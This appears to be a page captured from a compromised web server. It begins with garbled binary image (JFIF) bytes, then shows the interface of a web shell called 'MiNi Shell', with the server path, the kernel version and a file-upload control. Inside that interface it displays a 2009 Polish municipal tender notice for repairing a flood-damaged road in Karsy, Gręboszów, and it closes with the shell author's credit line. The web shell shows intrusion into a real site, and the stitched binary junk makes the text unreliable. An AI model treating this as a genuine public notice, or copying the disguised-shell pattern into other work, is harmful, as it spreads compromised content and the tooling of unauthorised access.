JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/75796-N-2009.html

<p class="kh_header"><b>Gręboszów: Remont drogi gminnej Karsy - Na Bugaj (zniszczonej przez powódź w 2006 r.), działka Nr 126 w miejscowości Karsy.</b><br>
<b>Numer ogłoszenia: 75796 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi gminnej Karsy - Na Bugaj (zniszczonej przez powódź w 2006 r.), działka Nr 126 w miejscowości Karsy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont  drogi gminnej dz. Nr 126 (zniszczonej przez powódź w 2006 r.) w miejscowości Karsy w km 0+000 do  0+400 o długości   0,400 km i szerokości 3,20 -3,30 m. Remont drogi obejmuje następujące roboty: Wykonanie warstwy górnej podbudowy  z kruszywa hutniczego o ciągłym uziarnieniu 0-31 mm - 1408,00 m2. 
Tłuczeń winien spełniać warunki do mechanicznej stabilizacji. Grubość warstwy górnej podbudowy po zagęszczeniu winna wynosić 13 cm. Wykonanie warstwy dolnej podbudowy z kruszyw naturalnych - 1448,00 m2, która po zagęszczeniu winna wynosić 20 cm. Przed ułożeniem podbudowy należy wykonać roboty 
ziemne polegające na zdjęciu warstwy ziemi o grubości do 20 cm - 256 m3,  z jej wywozem na odl. 1 km . Zjazd z drogi powiatowej z kruszyw łamanych 0-63 MM o grubości warstwy 15 cm po zagęszczeniu. Pobocza z urobku po wykonaniu koryta ziemnego wraz z zagęszczeniem - 40,00 m3..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 2.000 zł, słownie:   dwa tysiące złotych, które winno być wniesione  przed upływem terminu składania ofert. 2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
   3    Wadium wnoszone w formie pieniężnej należy wpłacić  przelewem na rachunek  bankowy
          Zamawiającego: Konto Nr  33 94621013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie 
         Tarnowskiej Oddział Gręboszów z dopiskiem  Wadium do przetargu na remont drogi  w m. Karsy.
   4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium na 
           rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
           Za termin  wniesienia wadium uznaje się datę wpływu na  rachunek   zamawiającego. Wadium 
           pieniężne musi być  zaksięgowane najpóźniej dzień przed upływem terminu składania ofert, dlatego 
           Wykonawca musi uwzględnić czas, aby wymagana kwota  zdążyła wpłynąć na konto Zamawiającego 
           (została zaksięgowana w banku na rzecz Zamawiającego) .  Ustawa prawo  zamówień publicznych nie 
           dopuszcza bezpośredniej wpłaty  w kasie zamawiającego.
     5.   W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany 
           jest on dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed 
           upływem  terminu składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat, a do 
           oferty  dołączyć kopię przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez 
           Wykonawcę.  Wymagana ważność wadium w formach innych niż pieniężna  minimum - 60 dni od daty 
            otwarcia ofert. Składane przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej 
           treści na przepis   art. 46 ust. 5 Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne 
           żądanie Zamawiającego.  
     6.   Wykonawca, który wniesie wadium w innej, niż wyżej wskazanej formie, jego oferta nie będzie 
           zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć go z postępowania na podstawie art. 24 
           ust.2 pkt 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Zgodnie z art. 22 ust.1 Ustawy o udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
     1)  posiadają uprawnienia do wykonywania określonej działalności będącej przedmiotem zamówienia. 
     2) posiadają niezbędną wiedzą i doświadczenie oraz dysponują  potencjałem  technicznym i osobami  
         zdolnymi  do  wykonania   zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do 
         udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz wykażą się 
         odpowiednim doświadczeniem t.j.: w ostatnich  5 latach, jeśli okres prowadzenia działalności  jest krótszy 
         - w tym okresie, wykonali co najmniej  2 zamówienia odpowiadające swoim rodzajem i wartości 
         minimum 100 tys. zł każde,   robotom budowlanym stanowiącym przedmiot zamówienia oraz, że zostały 
         one wykonane   z należytą starannością, 
     3) znajdują  się  w  sytuacji   ekonomicznej i finansowej    zapewniającej   wykonanie   zamówienia oraz 
          - są ubezpieczeni od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności gospodarczej 
            na kwotę nie niższą niż 100 tys. zł,
           -  uzyskali w ostatnim roku obrót na poziomie nie niższym niż  200 tys. zł.
     4) nie podlegają wykluczeniu z postępowania o zamówienie publiczne  na podstawie  art. 24 ustawy.
     5) spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
2.  W  przypadku gdy o udzielenie zamówienia ubiega się konsorcjum, wymaga się wówczas, aby żaden z jego 
      członków nie podlegał wykluczeniu z postępowania na podstawie art. 24  ustawy, a członkowie  łącznie 
      spełniali warunki określone w ust 1  niniejszego rozdziału.
3.  Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału na podstawie złożonych 
     w ofercie   oświadczeń i dokumentów wymienionych w rozdziale III specyfikacji istotnych warunków  
     zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na  potwierdzenie spełnienia warunków udziału w postępowaniu określonych w rozdziale II niniejszej
         specyfikacji Wykonawcy muszą dostarczyć następujące dokumenty i oświadczenia:
        1.  a) W celu potwierdzenia, że wykonawca  posiada uprawnienia do wykonania zamówienia, winien 
                złożyć: aktualny odpis  z właściwego rejestru albo aktualne  zaświadczenia o wpisie do ewidencji 
                działalności  gospodarczej,  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
                ewidencji  działalności gospodarczej, z którego to dokumentu wynika, że oferent prowadzi działalność 
                w zakresie   objętym  niniejszym zamówieniem, wystawionym nie wcześniej niż 6 miesięcy przed 
                 upływem terminu  składania  ofert.  W przypadku,  jeżeli działalność  gospodarcza przedsiębiorców jest 
                   prowadzona   w formie spółki  cywilnej  należy dołączyć  również  umowę spółki  cywilnej. 
             b) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
                 zamiast dokumentów, o których mowa w pkt 1.a) - składa dokument lub dokumenty wystawione 
                 w kraju,  w którym ma  siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto 
                 jego likwidacji ani nie ogłoszono upadłości. Dokument powinien być wystawiony nie wcześniej
                  niż 6 miesięcy  przed upływem składania ofert.
             c)  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma   siedzibę lub miejsce 
                  zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1.a), zastępuje się je   dokumentem 
                 zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, 
                  administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju 
                  pochodzenia osoby lub kraju, w którym ma siedzibę lub miejsce zamieszkania.

        2. W celu potwierdzenia, że wykonawca  posiada  niezbędną wiedzę i doświadczenie oraz dysponuje
            potencjałem  technicznym i osobami    zdolnymi  do  wykonania   zamówienia winien  złożyć:
            a) wykaz osób, którymi dysponuje lub będzie dysponował i które  będą uczestniczyć w wykonaniu 
                zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia 
                i wykształcenia niezbędnych do wykonania  zamówienia, a także zakresu wykonywanych przez nie
                czynności.  -wg (wzoru) dodatek nr 3 do  SIWZ.  Osoby, które będą uczestniczyć  w wykonywaniu 
                zamówienia, muszą posiadać wymagane   uprawnienia, jeżeli  ustawy nakładają obowiązek  posiadania  
                takich   uprawnień.  Należy załączyć odpis  odpowiednich  uprawnień budowlanych umożliwiających 
                sprawowanie funkcji kierownika budowy, oraz  aktualne zaświadczenie o przynależności jego do 
                samorządu zawodowego wraz z ubezpieczeniem od  odpowiedzialności cywilnej. 
           b)  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
                jeżeli w wykazie o którym mowa 2 pkt a) wykonawca wskazał osoby, którymi będzie dysponował,
           c)  wykaz   podwykonawców, posiadane ich kwalifikacje oraz rodzaj i wartości powierzonej im części 
                zamówienia - wg (wzoru) dodatek nr 4 do  SIWZ.
            d) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia 
                 postępowania, a jeżeli okres  prowadzenia działalności  jest krótszy w tym okresie, odpowiadających 
                 swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich 
                 wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty 

                 zostały wykonane należycie. -wg (wzoru) dodatek nr 5 do  SIWZ.  Wykonawca winien  wykazać, że 
                 wykonał  tym okresie,  co najmniej  2 zamówienia  odpowiadające swoim rodzajem i wartości 
                 minimum 100 tys. zł każde, robotom  budowlanym stanowiącym  przedmiot zamówienia  oraz, że 
                 zostały one wykonane  należycie (potwierdzone protokołami odbioru, referencjami itp.),
             e) wykaz niezbędnego do  wykonania zamówienia sprzętu technicznego, którym wykonawca dysponuje 
                 lub będzie dysponował,  obejmujący  minimum następujący sprzęt  budowlany:  koparka i  spycharka 
                 bądź  koparko-spycharka  lub ładowarka, równiarka,  walec   statyczny min. 10 ton itp.:   -  według 
                 (wzoru)  dodatek nr 6 do SIWZ;   
             f)  pisemne zobowiązanie innych podmiotów do  udostępnienia potencjału technicznego, jeżeli w wykazie,
                  o którym mowa w pkt 2e), wykonawca wskazał sprzęt techniczny, którym będzie dysponował.

          3. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
               zapewniającej wykonanie   zamówienia winien złożyć oświadczenie o sytuacji finansowej wykonawcy
               - wg (wzoru) dodatek  nr 7 do SIWZ, dołączając::
               a) sprawozdanie finansowe za ostatni rok,
               b) uzyskać w ostatnim roku obrót na poziomie nie niższym niż  200 tys. zł.
               c) ubezpieczyć się  od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności 
                   gospodarczej na kwotę nie niższą niż 100 tys. zł,

           4.  W celu potwierdzenia, że wykonawca nie podlega  wykluczeniu z postępowania o zamówienie 
                publiczne   na podstawie  art. 24 ustawy  winien złożyć oświadczenie wykonawcy  o spełnieniu  warunków 
                 udziału w postępowaniu o udzielenie zamówienia -według (wzoru)  dodatek. Nr 2  do  SIWZ. 

           5. W celu potwierdzenia, że wykonawca spełnia warunki określone w specyfikacji istotnych warunków 
               zamówienia winien złożyć:
               a) oferta przetargowa - według (wzoru) dodatek  nr 1  do SIWZ.
               b)  kosztorys ofertowy, sporządzony w sposób jak w rozdziale VI..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl  BIP Małopolska, gmina Gręboszów.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów, 33-260 Gręboszów 144, pokój nr 2 (parter) lub za pośrednictwem pocztowym po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem otwarcia ofert.Cena 50 zł + 22% VAT..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:00, miejsce: Urząd Gminy Gręboszów, 33-260 Gręboszów 144, pokój nr 11 (piętro) - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com